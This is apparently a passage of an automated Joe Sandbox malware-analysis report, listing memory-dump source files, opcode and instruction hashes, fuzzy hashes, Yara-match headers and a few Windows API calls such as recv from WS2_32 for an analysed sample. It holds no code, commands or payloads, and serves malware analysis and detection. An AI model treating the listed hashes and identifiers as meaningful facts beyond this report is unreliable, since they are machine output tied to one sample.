                                                                                                                                                                                                                                • Opcode ID: 55a18cb7e9209809d40c4c9bbb9e8c643312d3e0a18856fe51d7ff24042e1001
                                                                                                                                                                                                                                • Instruction ID: 1548395cfc78e6d1b50e83b1e90cc3407f33742842c81326c26f82953e64acaf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55a18cb7e9209809d40c4c9bbb9e8c643312d3e0a18856fe51d7ff24042e1001
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE1103A7748118AE72428D9567546B66B6EF6CB3383308F22F407CA602F2D43A79B131
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fc09d68244921deaecd1215dea8f848a8fa80a2ee48e5b44490cd9a90a12d7a0
                                                                                                                                                                                                                                • Instruction ID: 96cacdfb5dab411825cdf7d941963d223114b39223e263467c4ccf98896ac4e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc09d68244921deaecd1215dea8f848a8fa80a2ee48e5b44490cd9a90a12d7a0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38117AE790C2149DF2128D5819516F6AB2DF3E73383348B27E442CB683F2C8376A6132
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 36f02289236e7a20fa66eff351f6059f5eae03140bab6d0bbd69ae0889400310
                                                                                                                                                                                                                                • Instruction ID: 580c68665e7cf312557dc9994d2658d4a73b59c08e5cc2f18c48c7b62d291e6c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36f02289236e7a20fa66eff351f6059f5eae03140bab6d0bbd69ae0889400310
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D801D2A3B88218EEB2428D9917542BA666EF6972343308F26F403C9542F7C83A797131
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b894352665d09a79ffa7e510d2532c154196b21ad7b5f194a6e8be170cbcf280
                                                                                                                                                                                                                                • Instruction ID: 644a9817a4902899e322606497f50191e8e6b7e16f6fa87457969e039bd6fc35
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b894352665d09a79ffa7e510d2532c154196b21ad7b5f194a6e8be170cbcf280
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1001F2A3748118AE71428D552B146BA6A1EE1D72383308F22B403C9A42F2C83A797032
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8f98f19b48ac9fd2f1dc49e246bcd66ff9946512503ac078e19b44f4203be279
                                                                                                                                                                                                                                • Instruction ID: 946fdeaf5f996505723d87268dc60f1e4d33c81888bb7a434528819daa0504e9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f98f19b48ac9fd2f1dc49e246bcd66ff9946512503ac078e19b44f4203be279
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CF0C2E7688018ED30428D9626146F65A2EE1D7338370CF17F417C8902F3D436797132
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7d622759c1f9dc5777fd744c07ca17a8f9efa3fafadc3611d9eb6578b6ee2e43
                                                                                                                                                                                                                                • Instruction ID: f317ea367a63f486b305d41a59e4a0a7c51e9503abc554ad839c06a95e0038d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d622759c1f9dc5777fd744c07ca17a8f9efa3fafadc3611d9eb6578b6ee2e43
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21F054E7688418AD704288592B556F7572EE2D77383308F12B417D5986B3C837797031
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: d066aae4808d816ef89a585398d70e394f520c28165c92077f90300f37dde341
• Instruction ID: 2c780b6b3af850a577f7d85cfa57e1d4f22b5fc5f1675e368692af836f24345b
• Opcode Fuzzy Hash: d066aae4808d816ef89a585398d70e394f520c28165c92077f90300f37dde341
• Instruction Fuzzy Hash: 26C22771E086288BDF65CE28DD40BEAB7F5EB48304F1541EAD84DE7241E779AE819F40
APIs
• recv.WS2_32(?,?,00000004,00000000), ref: 0005E10B
• recv.WS2_32(?,?,00000008,00000000), ref: 0005E140
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: recv
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                                                                                                                • Opcode ID: 5127974dd445705785488d6e693a95420c8202d7a0df484434f065c7f6b6a39b
                                                                                                                                                                                                                                • Instruction ID: 5aaebafc6b5414d3b901de8087837ddd5bcca4a2bff5eee8bfa4de4d79e8ef3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5127974dd445705785488d6e693a95420c8202d7a0df484434f065c7f6b6a39b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D531E971A006485FE724CB68CC81BEB77FCEB08724F000625F950E72D1C679A944CBA4
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
• Instruction ID: 7b40c3cd77dbd5b68769e00ce3271bb4b2f8363c5b73686f8423afa2957b1c72
• Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
• Instruction Fuzzy Hash: 5DF13E71E012199BDF14CFA9C8906AEB7F1FF88314F158269E919AB345D731AE01DF90
APIs
• GetSystemTimePreciseAsFileTime.KERNEL32(?,0006CF52,?,00000003,00000003,?,0006CF87,?,?,?,00000003,00000003,?,0006C4FD,00052FB9,00000001), ref: 0006CC03
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: Time$FilePreciseSystem
• String ID:
• API String ID: 1802150274-0
• Opcode ID: 7f0393d61cbd011da6a2bb0d4a90c3b07ffe7a99406f97d20514f9bc8d00c58e
• Instruction ID: f1871876ba98121385ebf19667cd74bc0d485c0b026f329697bb74be2834b50a
• Opcode Fuzzy Hash: 7f0393d61cbd011da6a2bb0d4a90c3b07ffe7a99406f97d20514f9bc8d00c58e
• Instruction Fuzzy Hash: 72D02232746938D3EA512B88EC00EBCBB898F02B243040251ED0853130CA927C005BD1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
• Instruction ID: 7157d56430caf339873349ee9de486f914233380eccb2521b25c41a9571ccaef
• Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
• Instruction Fuzzy Hash: 4151CE302087085ADFF8B62988957BE67CA7F11304FA48139E6CAD7287CE22DD49C712
Strings
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Be
                                                                                                                                                                                                                                • API String ID: 0-3976833018
                                                                                                                                                                                                                                • Opcode ID: 57f1294f854a9718a4b796683f9404bed1e5c2a3e34a41554ed3acf374230e0a
                                                                                                                                                                                                                                • Instruction ID: a74d92becc1f3d76cab39c89644c36bfeede16009b17949aaf7e34bf03fb4b0d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57f1294f854a9718a4b796683f9404bed1e5c2a3e34a41554ed3acf374230e0a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8621B673F20439477B0CC57E8C522BDB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
